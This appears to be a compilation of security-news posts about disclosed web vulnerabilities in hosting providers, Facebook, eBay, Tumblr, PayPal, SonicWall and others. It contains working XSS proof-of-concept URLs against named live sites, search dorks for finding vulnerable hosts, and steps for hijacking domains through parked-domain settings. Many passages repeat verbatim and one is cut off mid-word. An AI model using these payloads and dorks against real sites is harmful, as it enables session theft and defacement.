Recently, We reported about the Reflected Cross Site scripting vulnerability in the HostGator India hosting site that affects millions of hosted sites. Today, Another Indian Security Researcher , Ramneek Sidhu , come with another interesting find.
Ramneek Sidhu has discovered Reflected XSS Vulnerability in One of the Biggest WebHosting site "HostMonster" (hostmonster.com). Just like in the previous case, this Vulnerability affects all sites hosted in the HostMonster.
The vulnerability discovered in Subdomain of Hostmonster:
Find the list of sites hosted in Hostmonster. You can do this by searching for "Ip:ip:74.220.207.104" in Bing. This single IP search gives 36,000 results. All of those sites are affected by this security flaw. For instance, let us take "vividhbharti.com".
The POC for this site is:
There is a javascript code that generate ads. Interestingly, the code uses referrer . The referrer is the current address. Unfortunately, the developers fails to sanitize the url. This results in Reflected XSS.
Ramneek Sidhu has discovered Reflected XSS Vulnerability in One of the Biggest WebHosting site "HostMonster" (hostmonster.com). Just like in the previous case, this Vulnerability affects all sites hosted in the HostMonster.
The vulnerability discovered in Subdomain of Hostmonster:
http://host104.hostmonster.com/"><SCRIPT>alert(document.cookie)</SCRIPT><SCRIPT>alert("Evolution of Revolution")</script><img src="http://i49.tinypic.com/1zq7cyp.jpg /" />The vulnerability was reported to Aarshit Mittal by the Security Researcher. Aarshit started to analyze the vulnerability and find few more interesting things. He discovered that each and every websites hosted in the Hostmonster vulnerable to Reflected XSS.
Find the list of sites hosted in Hostmonster. You can do this by searching for "Ip:ip:74.220.207.104" in Bing. This single IP search gives 36,000 results. All of those sites are affected by this security flaw. For instance, let us take "vividhbharti.com".
The POC for this site is:
http://vividhbharti.com/"><SCRIPT>alert(document.cookie)</SCRIPT><SCRIPT>alert("Evolution of Revolution")</script><img src="http://i49.tinypic.com/1zq7cyp.jpg /" />At EHN, i have just Analyzed the affected sites to know what cause this security flaw. It seems like this flaw occured when the developer try to display the ads in the 404 not found page.
There is a javascript code that generate ads. Interestingly, the code uses referrer . The referrer is the current address. Unfortunately, the developers fails to sanitize the url. This results in Reflected XSS.
HostGator is one of the leading Web hosting provider found to be vulnerable to Non-Persistent Cross Site scripting vulnerability. The vulnerability was discovered by Indian Security Researcher "Manjot Gill". The finding was intially published in one of my Friend Aarshit Mittal Security News portal Cyber-N.
The Researcher Manjot discovered the vulnerability in Subdomain of Hostgator. He also claimed that lot of sites hosted in Hostgator are vulnerable to.
Poc for the Subdomain XSS:
http://www.cluster2.hostgator.co.in/"><script>alert("HACKED BY ICH ")</script>Aarshit Mittal analyzed the finding and he discovered few more interesting things.
Search for "site:.hostgator.co.in", you will get more than 64,600 results. All of those subdomains are affected by this vulnerability. For Example take the first site from the result, "chahat.hostgator.co.in". It is affected by the XSS.
POC:
chahat.hostgator.co.in/"><script>alert(document.cookie)</script>Also, you can search for the list of sites hosted by searching for the IP dork in Bing. For Instance , search for "ip:119.18.48.78" in Bing will result the list of affected sites.
You can find the rest of vulnerable sites by changing the ip from "119.18.48.12" to "119.18.48.86".
Also the main domain is also affected by this vulnerability:
http://www.hostgator.co.in/"><script>alert(document.cookie)</script>
The affected sites are created and hosted via the IndiaGetOnline (www.indiagetonline.in). "Get India Business Online" is an initiative by Google that allows you to create a website for your business in 15 minutes, for free. HostGator is providing you with hosting, their leading site building tool, and support.
All the sites created by Hostgator "Site building tool" are affected by this vulnerability because of the main "site building" site(hostgator.co.in) itself affected by this security flaw.
A security Researcher Frans Rosén has discovered Cross Site Scripting vulnerability in Facebook and DropBox.
Initially , the researcher was working on finding security flaws on DropBox. He noticed that when using their web interface there were some restrictions on what filenames that were allowed. He tried to rename the file with '"><img src=x onerror=alert(document.domain)>.txt But he got error message that some special characters are not allowed.
"But, if you instead, connected a local directory, created a file there and synced it, you got it inside Dropbox without any problems."The researcher explained in his blog. "Using this method I was able to find two issues with their notification messages showing unescaped filenames."
He notified DropBox about the vulnerability and they have successfully patched the flaw.
After some time, he noticed that there is connection between DropBox and Facebook. You can add files directly from DropBox to your Facebook groups. So he was curious to test the vulnerability in Facebook also.
In his Facebook group, he tried to add the previously uploaded file in the DropBox. After he posted in the group, the xss attack didn't work. But when he clicked the 'Share' link in the post, he got alert message. Yes, Successfully, he managed to run the Script in Facebook. The XSS also worked when he shared the crafted pin from the Pinterest.
Researcher got $3,500 USD bug bounty for notifying the vulnerability, facebook fixed the vulnerability now.
Jason A. Donenfeld has discovered a Critical vulnerability in one of the famous wordpress plugin "W3 Total Cache". The plugin helps to improve the user experience of your site by improving your server performance, caching every aspect of your site.
The cache data is stored in public accessible directory, which means a malicious hacker can browse and download the password hashes and other database information.
A simple Google search for "inurl:wp-content/plugins/w3tc/dbcache" returns the list of word press affected by this vulnerability.
According to Jason, the cache files are by default publicly downloadable, and the key values / file names of the database cache items are easily predictable, even with directory listing off.
He also published a simple shell script to identify and exploit this bug:
http://git.zx2c4.com/w3-total-fail/tree/w3-total-fail.sh
Wordpress users are advised to either upgrade the plugin to new version or deny access to plugin directory by making an extra .htccess in that folder.
Last month, we learned that hackers hacked the Pakistani google and other sites by hijacking DNS records. Hackers modified the DNS records such that it points to freehostia site where attacker host the deface page.
Now, An Indian Security researcher Aarshit Mittal come with an interesting find , he has discovered critical DNS hijacking vulnerability in popular free web-hosting providers. The vulnerability allows attackers to take control of the websites hosted.
Aarshit has demonstrate how to exploit the vulnerability in his blog. Attacker need to create an account in the target web hosting provider. He has explained the vulnerability with 000webhost.com.
Once you created the account, you should login into the CPanel where you can see the Shared IP address. Searching for that IP address with some keywords in Bing returns the sites hosted in that specific IP.
Interestingly, Aarshit managed to find some government sites(csirt.gov.bd) that has been hosted in the 000webhost.
After discovering the list of sites hosted , attacker can add those domain names to 'parked domains' in the CPanel. The CPanel successfully allowed him to add the domain name.
Now hacker just need to upload defacement page to his hosting account. Boom.! Now you can see the defacement page in the victim site. Also you can create lot of sub domains in the hijacked domains.
By exploiting this security flaw, researcher successfully hijacked the following domain:
List of affected sites:
Not only these sites are affected, there are plenty of free hosting server affected by this vulnerability.
Now, An Indian Security researcher Aarshit Mittal come with an interesting find , he has discovered critical DNS hijacking vulnerability in popular free web-hosting providers. The vulnerability allows attackers to take control of the websites hosted.
Aarshit has demonstrate how to exploit the vulnerability in his blog. Attacker need to create an account in the target web hosting provider. He has explained the vulnerability with 000webhost.com.
Once you created the account, you should login into the CPanel where you can see the Shared IP address. Searching for that IP address with some keywords in Bing returns the sites hosted in that specific IP.
Interestingly, Aarshit managed to find some government sites(csirt.gov.bd) that has been hosted in the 000webhost.
After discovering the list of sites hosted , attacker can add those domain names to 'parked domains' in the CPanel. The CPanel successfully allowed him to add the domain name.
Now hacker just need to upload defacement page to his hosting account. Boom.! Now you can see the defacement page in the victim site. Also you can create lot of sub domains in the hijacked domains.
By exploiting this security flaw, researcher successfully hijacked the following domain:
- test.fraymamertoesquiu.gov.ar
- test.concejodeitagui.gov.co
- dns.hviota.gov.co
- test.digitizeyou.in
- men.csirt.gov.bd
- bd.csirt.gov.bd
List of affected sites:
- www.freehostia.com/
- www.freewebhostingarea.com/
- x10hosting.com/
- www.110mb.com/
Not only these sites are affected, there are plenty of free hosting server affected by this vulnerability.
A pingback security bug exists in the Wordpress blogging platform may be exploited to launch distributed denial-of-service (DDoS) attacks, according to web application security firm Acunetix.
The vulnerability is exploitable through the platform’s XMLRPC API (through XMLRPC.PHP).
A malicious hacker can spoof a pingback to a specific blog in order to guess hosts inside each network they target, port scan those hosts, reconfigure internal routers or simply launch DDoS attacks.
The team successfully implemented an Acunetix WVS script to test this security flaw. This script will try to resolve various common internal hosts and try to connect to common ports. In the end, it will report the successful attempts.
Vulnerability-Lab researchers have found multiple persistent input validation web vulnerabilities in the Enterpriser16 v7.1 Load Balancer Application.
The first vulnerabilities are located in the `Edit Configuration` module with the bound vulnerable Label, Virtual Host, Request to send, Email Alerts and Response expected parameters.
The secound vulnerabilities are located in the Create Solution, Access points and New Contract module with the bound vulnerable title, asset name, contract name, name or description parameter requests.
Exploitation requires low user interaction and a low privileged application user account. Successful exploitation of the vulnerability can lead to persistent session hijacking (manager/admin), persistent phishing or persistent module web context manipulation.
A detailed proof-of-concept can be found here.
The Vulnerability Laboratory Research Team discovered persistent web vulnerability in the official Paypal (core) ecommerce website content management system.
The security flaw allows remote attackers to implement/inject own malicious script code on the application side (persistent).
The persistent input validation vulnerability is located in the Adressbuch module with the bound vulnerable search function when processing to request script code tags as `Addressbuch` contacts. The code will be executed out of the search result listing web context. Remote exploitation requires low user interaction and a privileged paypal banking application user account.
Successful exploitation of the vulnerability results in persistent session hijacking (admin), account steal via persistent phishing or persistent search module web context manipulation.
In an email sent to EHN, The Vulnerability has submitted the proof-of-concept for the security flaw. You can find the poc code here : http://pastebin.com/LhB82k4F
The name with the code was saved in the addressbook. Only the matching and successful result leads to the persistent execution of the web context.
When the other user is searching the existing account of the addressbook the code will be executed persistent out of the matching search result web context listing.
Few months after the vulnerability notified the Paypal , Paypal security team has successfully patched the vulnerability on December 11.
Recently we reported that the reason behind the Tumblr reblog attack is Stored cross Site scripting(XSS) vulnerability. The vulnerability was discovered by a security researcher Janne Ahlberg. Janne says the vulnerability is not yet fixed.
According to his research, It is possible to embed JavaScript and some other HTML tags to certain Tumblr post types (e.g. video post).
The vulnerability can be used for launching phishing attacks. For instance,it would be quite easy to ask input from user in various ways. User input could be stored to attackers server. Attacker could push malicious files from his/her server to Tumblr users.
"Attacker could create several Tumblr accounts and start blogging viral or popular videos using well chosen tags. Trust and popularity could be increased by using other accounts for reblogging video posts."Researcher described one possible attack scenario.
"Once the 'attack blog' would have enough followers, attacker could create a malicious post again with carefully selected tags. If the followers would reblog a malicious post, the spreading of payload would start."
 |
| Boolean Based SQL Injection vulnerability |
Recently, The news about the Pakistani Google hack spread like a wildfire in the Internet. At the time, Top Level Pakistan Domains displayed the defacement page including Yahoo, MSN, HSBC, EBay,Paypal and more sites.
Today, khanisgr8, a hacker from Pakistan hacker collective called "TeamBlackHats" sent an email regarding the security breach. He explains how those websites got hacked by Turkish Hacker group "EBoz".
The day before yesterday we mentioned those hacked sites' dns records points to different free hosting site. Also we report that the site might be hacked using PKNIC vulnerability.
PKNIC is responsible for the administration of the .PK domain name space, including the operation of the DNS for the Root-Servers for .PK domains,
and registration and maintenance of all .PK domain names. PKNIC is operated as a self-supporting organization.
The hackers have claimed to have discovered a Boolean-based blind SQL injection, persistent cross site scripting, sensitive directory directory disclosure vulnerabilities in the official website of PKNIC.
They provide us the vulnerable link with POC to exploit it. Also they sent some data compromised using the vulnerability which contains database details, username and hashed password.
 |
| Xss vulnerability |
He also provide the screenshot of the Cross site scripting vulnerability. When i tried to verify the XSS vulnerability, i just searched in google for the url and visit a PKNIC link. After visiting the link, i just saw a text "<script>alert("HACKED BY COde InjectOr")</script>". May be Code Injector team attempts to exploit the vulnerability.
"Apparently Google Pakistan has been defaced by a Turkish Hacker group 'Eboz' . It's still quite hard to believe that Google server has been hacked. They really need to put a lot of focus on their defenses because if one website got hacked that means every other websites can be hacked. " they said.
We have sent an email to PKNIC regarding the vulnerability and waiting for their response. We are not sure whether the vulnerability is fixed or not So we are not providing the vulnerable link here.
The Indian security researcher, Shubham Upadhyay with online handle Cyb3R_Shubh4M, has discovered a persistent cross site scripting vulnerability in eBay site.
In an email sent to Xssed.com, researcher explained the details of vulnerability. In order to exploit the vulnerability, attackers would need a seller account.Once login to seller account on eBay, the attacker would create a listing for sale where he put the XSS exploit code.
At the time of writing , the vulnerability is unfixed . Here is the page where he injected his code:
http://www.ebay.com/itm/181023275832?ssPageName=STRK:MESELX:IT&_trksid=p3984.m1555.l2649
The mirror is available here:
http://www.xssed.com/mirror/79254/
According to the researcher, it also gets executed in the cgi.ebay.com domain when logged in the seller acco
In an email sent to Xssed.com, researcher explained the details of vulnerability. In order to exploit the vulnerability, attackers would need a seller account.Once login to seller account on eBay, the attacker would create a listing for sale where he put the XSS exploit code.
At the time of writing , the vulnerability is unfixed . Here is the page where he injected his code:
http://www.ebay.com/itm/181023275832?ssPageName=STRK:MESELX:IT&_trksid=p3984.m1555.l2649
The mirror is available here:
http://www.xssed.com/mirror/79254/
According to the researcher, it also gets executed in the cgi.ebay.com domain when logged in the seller acco
Reflected Cross site scripting vulnerability has been found in Verizon by #Nullcrew.
The hacker tweeted the poc for the vulnerability
It successfully redirects me to Google. It means that an attacker can lure user into clicking the crafted link and redirects to any sites he want. The attacker can hijack sessions and more.
The hacker tweeted the poc for the vulnerability
"http://games.verizon.com/landing/p/freeplay/instr.jsp?gameId=722050&gameTitle=%3Cscript%3Ealert%28%22Lulz.%22%29%3C/script%3E"As usual, i have tested whether the vulnerability allows attacker to redirect to another site by injecting the following code:
document.location="http://www.google.com"
It successfully redirects me to Google. It means that an attacker can lure user into clicking the crafted link and redirects to any sites he want. The attacker can hijack sessions and more.
An Information disclosure 0-day vulnerability has been discovered in Novell ZENworks Asset Management 7.5 that allows that allows a remote attacker to read any file with SYSTEM privileges and retrieve configuration parameters from ZENworks Asset Management.
The web console is provided as a Java web application named rtrlet. Two HandleMaintenanceCalls, GetFile_Password and GetConfigInfo_Password have hard-coded credentials. GetFile_Password allows access to any file on the filesystem and GetConfigInfo_Password allows access to ZENworks Asset Management configuration parameters along with the back-end system's credentials.
ZENworks Asset Management provides a Web Console, where the user can access the data collected about network devices and edit some information.
The web console is provided as a Java web application named rtrlet. Two HandleMaintenanceCalls, GetFile_Password and GetConfigInfo_Password have hard-coded credentials. GetFile_Password allows access to any file on the filesystem and GetConfigInfo_Password allows access to ZENworks Asset Management configuration parameters along with the back-end system's credentials.
The vulnerability discovered by Rapid7 exploit developer Juan Vazquez ,wrote an exploit module for Metasploit. Metasploit notified both Novell and CERT, as per its disclosure policy.
US-CERT is not currently aware of any solutions to the problem, but they suggest some workarounds " Restrict Access: Appropriate firewall rules should be put in place so only trusted users can access the web interface."
A Security Researcher from India, Girish Shrimali has discovered Cross site scripting vulnerability in the official website of an Indian scientist and administrator who served as the 11th President of India, A. P. J. Abdul Kalam.
The discovered XSS vulnerability is Reflected type, means non-persistent vulnerability and exploited via crafted url.
Normally, The Reflected XSS are considered as low risk. Even thought the risk level is estimated as low, the attackers can redirect users to phishing or any other malicious sites.
POC:
http://www.abdulkalam.com/kalam/jsp/display_hints.jsp?menuid=22&menuname=%3Cscript%3Ealert%28%27XSS+found+by+Girish+Shrimali%27%29%3B%3C%2Fscript%3E&starts=0&ends=0
A grey-hat hacker has discovered Critical SQL injection and cross site scripting vulnerability in the official website of The U.S. Navy (navy.mil).
"Recently I was pentesting one of navy.mil subdomains and found serious sql injection that allowed me to extract sensitive data from website database.Sql injection is located in post parameters of a form value.Attacker just needs to craft valid query and submit it to the server." the hacker wrote in an email.
 |
| SQLi vulnerability |
He also discovered two xss vulnerabillites located on same subdomain , one is post xss and other is get xss , both reflective
"I have reported this to website security and I hope it will be resolved soon.After the fix I will disclose link locations on my blog http://m4x0n3.blogspot.com/." hacker said.
"Never trust user input." The hacker said as message to webmasters.
Vulnerability Laboratory Research Team has discovered multiple Web Vulnerabilities in SonicWalls UTM Email Security v7.3.5.6379 & Virtual Appliance.
Affected Products:
==================
SonicWall
Product: AntiSpam & EMail Security Appliance Application v7.3.5.6379
Exploitation-Technique:
=======================
Remote
Severity:
=========
High
Details:
========
1.1
Multiple persistent input validation vulnerabilities are detected in SonicWalls UTM Email Security v7.3.5.6379 & Virtual Appliance.
The vulnerability allows an remote attacker or local low privileged user account to inject/implement malicious persistent script code on application side of the email security appliance application.
The vulnerabilities are located on the Compliance & Virus
protection procedures module when processing to load unsanitized inputs as output listing of a configuration. Vulnerable values are floodMsgThreshold, zombieNoOfQuarantine, zombieNoOfMessageFromOneUser, safeModeNoOfQuarantine, safeModeNoOfMessageFromOneUser,zombieAllowEmailAddrs & floodMsgThresholdShadow. Successful exploitation of the vulnerability result in session hijacking,persistent phishing requests & stable persistent module context manipulation.
Vulnerable Module(s):
[+] Virenschutzverfahren
[-] Ausgehend (Outgoing) - Listing & Exceptions
[+] Compliance Module
[-] Approval Ordner > Add new Approval Folder
1.2
Multiple client side cross site scripting vulnerabilities are detected in SonicWalls UTM Email Security v7.3.5.6379 & Virtual Appliance.
The vulnerability allows an remote attacker to manipulate client side appliance requests with medium required user inter action.
Successful exploitation results in sessio hijacking, account steal, client side phishing requests or manipulated context
exection on client side requests. The vulnerabilities are located on the `from`- & `row` page listing values. Successful exploitation
of the vulnerability result in client side session hijacking, non-persistent phishing requests & non-persistent module context manipulation.
Vulnerable Module(s):
[+] Listing Page (?from & ?row)
Proof of Concept:
=================
1.1
The persistent input validation vulnerabilities can be exploited by remote attackers with low privileged user accounts.
For demonstration or reproduce ...
PoC: Ausgehend (Outgoing) - Listing & Exceptions
<input disabled="disabled" id="floodMsgThreshold" name="floodMsgThreshold" value=""
type="hidden"><iframe src="virus_config-Dateien/a.htm" [EXECUTE/INJECT PERSISTENT CODE!]' <"="">
<input type="hidden" id="floodInterval" name="floodInterval"
value="1"/>
... or
<input type="text"
name="zombieNoOfQuarantine" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="zombieNoOfQuarantine">
... or
amp;lt;input type="text"
name="zombieNoOfMessageFromOneUser" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="zombieNoOfMessageFromOneUser">
... or
<input type="text"
name="safeModeNoOfQuarantine" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="safeModeNoOfQuarantine">
... or
<input type="text"
name="safeModeNoOfMessageFromOneUser" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="safeModeNoOfMessageFromOneUser">
URL: http://esserver.127.0.0.1:8080/virus_config.html
PoC: Compliance Module -> Approval Ordner - Listing & Exceptions
<tbody><tr><td background="policy_approval_box_summary-Dateien/nav_bar_background.gif" width="24">
<img src="policy_approval_box_summary-Dateien/clear.gif" height="15" width="4"></td><td border="0"
background="policy_approval_box_summary-Dateien/nav_bar_background.gif"><span class="column">Approval-
Ordner</span></td><td border="0" background="policy_approval_box_summary-Dateien/nav_bar_background.gif">
<span class="column">Nachrichten, die eine Genehmigung erfordern</span></td><td background="policy_approval_box_
summary-Dateien/nav_bar_background.gif"> </td></tr><tr>
<td height="12"> </td>
<td><a href="http://esserver.demo.sonicwall.com/policy_approval_box.html
?pathname=[INJECTED PERSISTENT CODE!]"><iframe src="policy_approval_box_
summary-Dateien/a.htm" [EXECUTION OF PERSISTENT CODE!]" <<="" a=""></td>
<td>0</td>
<td><div
align="right"><input type="button" name="delete" class="button"
value="Löschen"
URL: http://esserver.127.0.0.1:8080/policy_approval_box_summary.html
1.2
The client side cross site scripting vulnerability can be exploited by remote attackers with medium required user inter action.
For demonstration or reproduce ...
PoC:
http://esserver.127.0.0.1:8080/alert_history.html?from=200<%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/alert_history.html[POST REQUEST]row=200<%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/policy_approval_box.html?pathname=%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
Risk:
=====
1.1
The security risk of the persistent input validation vulnerabilities are estimated as high(-).
1.2
The security risk of the client side cross site scripting vulnerabilities are estimated as low(+).
UPDATE:Patch
"Dell SonicWALL E-mail security customers: 7.3.6 patch is now available https://www.mysonicwall.com/Firmware/DownloadCenter.aspx"
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
PoC Video:
While most businesses now have some type of anti-spam protection, many must deal with cumbersome management, frustrated users, inflexible solutions, and a higher-than-expected total cost of ownership. SonicWALL® Email Security can help. Elegantly simple to deploy, manage and use, award-winning SonicWALL Email Security solutions employ a variety of proven and patented technology designed to block spam and other threats effectively, easily and economically. With innovative protection techniques for both inbound and outbound email plus unique management tools, the Email Security platform delivers superior email protection today—while standing ready to stop the new attacks of tomorrow.
SonicWALL Email Security can be flexibly deployed as a SonicWALL Email Security Appliance, as a software application on a third party Windows® server, or as a SonicWALL Email Security Virtual Appliance in a VMW® environment. The SonicWALL Email Security Virtual Appliance provides the same powerful protection as a traditional SonicWALL Email Security appliance, only in a virtual form, to optimize utilization, ease migration and reduce capital costs.
Affected Products:
==================
SonicWall
Product: AntiSpam & EMail Security Appliance Application v7.3.5.6379
Exploitation-Technique:
=======================
Remote
Severity:
=========
High
Details:
========
1.1
Multiple persistent input validation vulnerabilities are detected in SonicWalls UTM Email Security v7.3.5.6379 & Virtual Appliance.
The vulnerability allows an remote attacker or local low privileged user account to inject/implement malicious persistent script code on application side of the email security appliance application.
The vulnerabilities are located on the Compliance & Virus
protection procedures module when processing to load unsanitized inputs as output listing of a configuration. Vulnerable values are floodMsgThreshold, zombieNoOfQuarantine, zombieNoOfMessageFromOneUser, safeModeNoOfQuarantine, safeModeNoOfMessageFromOneUser,zombieAllowEmailAddrs & floodMsgThresholdShadow. Successful exploitation of the vulnerability result in session hijacking,persistent phishing requests & stable persistent module context manipulation.
Vulnerable Module(s):
[+] Virenschutzverfahren
[-] Ausgehend (Outgoing) - Listing & Exceptions
[+] Compliance Module
[-] Approval Ordner > Add new Approval Folder
1.2
Multiple client side cross site scripting vulnerabilities are detected in SonicWalls UTM Email Security v7.3.5.6379 & Virtual Appliance.
The vulnerability allows an remote attacker to manipulate client side appliance requests with medium required user inter action.
Successful exploitation results in sessio hijacking, account steal, client side phishing requests or manipulated context
exection on client side requests. The vulnerabilities are located on the `from`- & `row` page listing values. Successful exploitation
of the vulnerability result in client side session hijacking, non-persistent phishing requests & non-persistent module context manipulation.
Vulnerable Module(s):
[+] Listing Page (?from & ?row)
Proof of Concept:
=================
1.1
The persistent input validation vulnerabilities can be exploited by remote attackers with low privileged user accounts.
For demonstration or reproduce ...
PoC: Ausgehend (Outgoing) - Listing & Exceptions
<input disabled="disabled" id="floodMsgThreshold" name="floodMsgThreshold" value=""
type="hidden"><iframe src="virus_config-Dateien/a.htm" [EXECUTE/INJECT PERSISTENT CODE!]' <"="">
<input type="hidden" id="floodInterval" name="floodInterval"
value="1"/>
... or
<input type="text"
name="zombieNoOfQuarantine" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="zombieNoOfQuarantine">
... or
amp;lt;input type="text"
name="zombieNoOfMessageFromOneUser" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="zombieNoOfMessageFromOneUser">
... or
<input type="text"
name="safeModeNoOfQuarantine" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="safeModeNoOfQuarantine">
... or
<input type="text"
name="safeModeNoOfMessageFromOneUser" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="safeModeNoOfMessageFromOneUser">
URL: http://esserver.127.0.0.1:8080/virus_config.html
PoC: Compliance Module -> Approval Ordner - Listing & Exceptions
<tbody><tr><td background="policy_approval_box_summary-Dateien/nav_bar_background.gif" width="24">
<img src="policy_approval_box_summary-Dateien/clear.gif" height="15" width="4"></td><td border="0"
background="policy_approval_box_summary-Dateien/nav_bar_background.gif"><span class="column">Approval-
Ordner</span></td><td border="0" background="policy_approval_box_summary-Dateien/nav_bar_background.gif">
<span class="column">Nachrichten, die eine Genehmigung erfordern</span></td><td background="policy_approval_box_
summary-Dateien/nav_bar_background.gif"> </td></tr><tr>
<td height="12"> </td>
<td><a href="http://esserver.demo.sonicwall.com/policy_approval_box.html
?pathname=[INJECTED PERSISTENT CODE!]"><iframe src="policy_approval_box_
summary-Dateien/a.htm" [EXECUTION OF PERSISTENT CODE!]" <<="" a=""></td>
<td>0</td>
<td><div
align="right"><input type="button" name="delete" class="button"
value="Löschen"
URL: http://esserver.127.0.0.1:8080/policy_approval_box_summary.html
1.2
The client side cross site scripting vulnerability can be exploited by remote attackers with medium required user inter action.
For demonstration or reproduce ...
PoC:
http://esserver.127.0.0.1:8080/alert_history.html?from=200<%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/alert_history.html[POST REQUEST]row=200<%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/policy_approval_box.html?pathname=%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
Risk:
=====
1.1
The security risk of the persistent input validation vulnerabilities are estimated as high(-).
1.2
The security risk of the client side cross site scripting vulnerabilities are estimated as low(+).
UPDATE:Patch
"Dell SonicWALL E-mail security customers: 7.3.6 patch is now available https://www.mysonicwall.com/Firmware/DownloadCenter.aspx"
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
Hackers have managed to gain access to a number of women's private, nude photos on Photobucket, then posted in public Web forums.
An entire thread on Reddit is devoted to posting X-rated pics stolen from Photobucket, an online photo-hosting platform. Some pose in underwear or completely nude, some hide their faces while others stare directly into the camera — but none intended to share the photos.
Unbelievably, another thread takes requests. Reddit users post names of girls whose private photos they want to see.
Skilled hackers are bypassing Photobucket's security settings and scouring for naked photos users wanted to keep private. They use software to retrieve the hidden snaps, a disturbing trend known as "fusking."
Photobucket users have the option of making their albums or individual photos private, but every single photo still has its own URL.
The image title is part of the URL, and even if the URL is private, the title isn’t hard to find.
For example, if a user has an image titled IMG_03 that is made public, they likely have an IMG_04, even if it’s not public. Frisking programs essentially speed up the guessing process and produce URLs for someone’s hidden photos, something like: http://www.photobucket/com/image/username/IMG_04.jpg.
Photobucket says it’s aware of fusking and provides a URL scrambling service that makes photos harder to hack.
“Scrambled URLs have been an option for the past two years and will be the default for all new uploads,” Photobucket spokesman David Toner said. “The company is in the process of reminding users about the option to scramble URLs to prevent fusking.”
Toner added that the breach of privacy is “very rare” and said it has “only affected a small number of Photobucket’s users.”
Experts say the best way to avoid starring in your own X-rated Reddit show is to keep nude photos off the Internet altogether — private or not.
“Privacy settings on social media sites just can’t keep up with how fast technology is adapting,” social media attorney Ethan Wall said
“As sites get more private, hackers and people who want to get more information will continue to get more sophisticated.”Wall added.
Vulnerability-Lab researchers discovered a new serious vulnerability in the Barracuda appliances, that could affect a number of companies which rely on Barracuda products.
The input filter blocks persistent input attacks with a restriction/filter exception for double quotes, <>,frames, scripts & statements. The vulnerability allows to bypass the existing input validation filter & exception handling.
“The bug is located when processing to save the URL path name (DB stored) with attached file. The vulnerability allows the bypassing of the path URL name parse restriction which leads to the execution on a second vulnerable bound module which displays the input as output listing,” the advisory reads.
The Account MyResource Display (example listing + input) & Upload File modules are executing the earlier saved `save` path of url-path/folder which leads to the bypass of the input validation filter & exception-handling. The result is the persistent execution of malicious script codes out of the security appliance application context.
“The URL path function saves the context of the input path name (parsed) as client side request via URL. If the request is getting bound with the file, which is getting stored (persistent) and displayed later on the overview listings, the code is getting executed unauthorized out of the security application context (persistent|server-side),” the experts explain.
The researchers say that the flaw can be fixed by parsing the second input request of the “file upload” function and the path URL request.
To demonstrate their findings, the experts have published a proof-of-concept video :
Barracuda Networks has been notified of the issues sometime in May, but so far it’s uncertain when a patch will be made available.
The input filter blocks persistent input attacks with a restriction/filter exception for double quotes, <>,frames, scripts & statements. The vulnerability allows to bypass the existing input validation filter & exception handling.
“The bug is located when processing to save the URL path name (DB stored) with attached file. The vulnerability allows the bypassing of the path URL name parse restriction which leads to the execution on a second vulnerable bound module which displays the input as output listing,” the advisory reads.
The Account MyResource Display (example listing + input) & Upload File modules are executing the earlier saved `save` path of url-path/folder which leads to the bypass of the input validation filter & exception-handling. The result is the persistent execution of malicious script codes out of the security appliance application context.
“The URL path function saves the context of the input path name (parsed) as client side request via URL. If the request is getting bound with the file, which is getting stored (persistent) and displayed later on the overview listings, the code is getting executed unauthorized out of the security application context (persistent|server-side),” the experts explain.
The researchers say that the flaw can be fixed by parsing the second input request of the “file upload” function and the path URL request.
To demonstrate their findings, the experts have published a proof-of-concept video :
Barracuda Networks has been notified of the issues sometime in May, but so far it’s uncertain when a patch will be made available.
A Security researcher, Riyaz Ahemed Walikar, has posted evidence of a serious persistent Cross Site Scripting(XSS) vulnerability on Tumblr, the popular microblogging platform.
XSS flaws are highly common on websites these days, but most of them are non-persistent and implicitly less dangerous.
"XSS can cause a lot of serious problems. An attacker can steal cookies, redirect users to fake or malicious sites, control a user's browser using automated frameworks like BeEF and download and execute exploits on the victim's computer," Researcher said in the blog post.
"Stored XSS is even more dangerous since the script is stored on the server and is executed everytime user visits an infected page."
Researcher found vulnerability on the 'Register Application' page at http://www.tumblr.com/oauth/apps. The application was not sanitizing user input when a user would create a new application. An XSS attack vector like tester "><img src='x' onerror="alert(document.cookie)"/> would trigger an alert box, displaying the user's cookie, in the browser.
Tumblr were notified more than three weeks ago on the issue. Finally, they fixed the vulnerability Today(july 14).
If you don't know what XSS is, you can read this article "Xss For Beginners".
A security Researcher , Gambit, has discovered Cross site scripting vulnerability in Microsoft official website.
He found the vulnerability last month and reported the vulnerabilities to the Microsoft.
"Well last month I was looking around on MSN.com and Microsoft.com I found two XSS vulnerabilities, one in each domain. I reported the vulnerabilities to the Microsoft security team and secured a spot on their acknowledgments page."Gambit said in his blog.
Microsoft listed his name in the 'Security Researcher Acknowledgments for Microsoft Online Services' page.
'asia.perf.glbdns.microsoft.com' page is vulnerable to XSS. Researcher managed to execute the XSS code in the page.
POC: "asia.perf.glbdns.microsoft.com/files/top.php?domain=<script>alert(/Gambit/)</script>"
He found the vulnerability last month and reported the vulnerabilities to the Microsoft.
